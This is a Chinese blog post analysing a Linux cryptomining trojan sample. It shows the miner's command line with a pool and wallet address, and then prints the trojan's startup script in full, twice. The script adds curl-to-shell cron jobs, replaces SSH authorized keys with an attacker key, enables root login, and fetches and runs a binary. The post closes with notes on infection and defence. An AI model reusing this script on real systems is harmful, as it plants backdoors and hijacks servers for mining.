Chinaunix首页 | 论坛 | 博客
  • 博客访问: 48511
  • 博文数量: 13
  • 博客积分: 10
  • 博客等级: 民兵
  • 技术积分: 140
  • 用 户 组: 普通用户
  • 注册时间: 2011-07-25 18:24
个人简介

公众号:RiboseYim 个人站点:http://riboseyim.github.io?source=chinaunix

文章分类

全部博文(13)

分类: 网络与安全

2016-07-19 10:07:56

木马来袭:(2)今天你被挖矿了吗?
书接上文,针对编号101样本的分析,我们已经知道,黑色产业界通过植入木马,控制了大量主机资源,只要有人花钱,
就可以按需要调度足够的资源发动DDos攻击,据说还可以按效果付费。

此外,还有一种常见模式则是“挖矿木马”,首先还是来看样本:

root 3744 29921 0 19:53 pts/0 00:00:00 grep min
root 31333 1 99 19:48 ? 02:46:38 /opt/minerd -B -a cryptonight 
-o stratum+tcp://xmr.crypto-pool.fr:8080 -u  48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKk
cvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x

uptime看到的负载值非常高。

启动脚本

echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs 
echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/crontabs/root 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; 
then mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys* 
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart 
fi 
if [ ! -f "/etc/init.d/lady" ]; 
then if [ ! -f "/etc/systemd/system/lady.service" ]; 
then mkdir -p /opt
        curl -fsSL `uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start 
echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs 
echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/crontabs/root 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; 
then mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys* 
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart 
fi 
if [ ! -f "/etc/init.d/lady" ]; 
then if [ ! -f "/etc/systemd/system/lady.service" ]; 
then mkdir -p /opt
        curl -fsSL `uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start

mkdir -p /opt 
# /etc/init.d/lady stop 
# systemctl stop lady.service 
# pkill /opt/cron 
# pkill /usr/bin/cron 
# rm -rf /etc/init.d/lady 
# rm -rf /etc/systemd/system/lady.service 
# rm -rf /opt/KHK75NEOiq33 
# rm -rf /usr/bin/cron 
# rm -rf /usr/bin/.cron.old 
# rm -rf /usr/bin/.cron.new

商业模式

被植入比特币“挖矿木马”的电脑,系统性能会受到较大影响,电脑操作会明显卡慢、散热风扇狂转;另一个危害在于,“挖矿木马”会大量耗电,并造成显卡、CPU等硬件急剧损耗。比特币具有匿名属性,其交易过程是不可逆的,被盗后根本无法查询是被谁盗取,流向哪里,因此也成为黑客的重点窃取对象。

攻击&防御

植入方式:安全防护策略薄弱,利用Jenkins、Redis等中间件的漏洞发起攻击,获得root权限。

最好的防御可能还是做好防护策略、严密监控服务器资源消耗(CPU/load)。

这种木马很容易变种,很多情况杀毒软件未必能够识别:
63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017


QQ20160711-0.png


阅读(5631) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~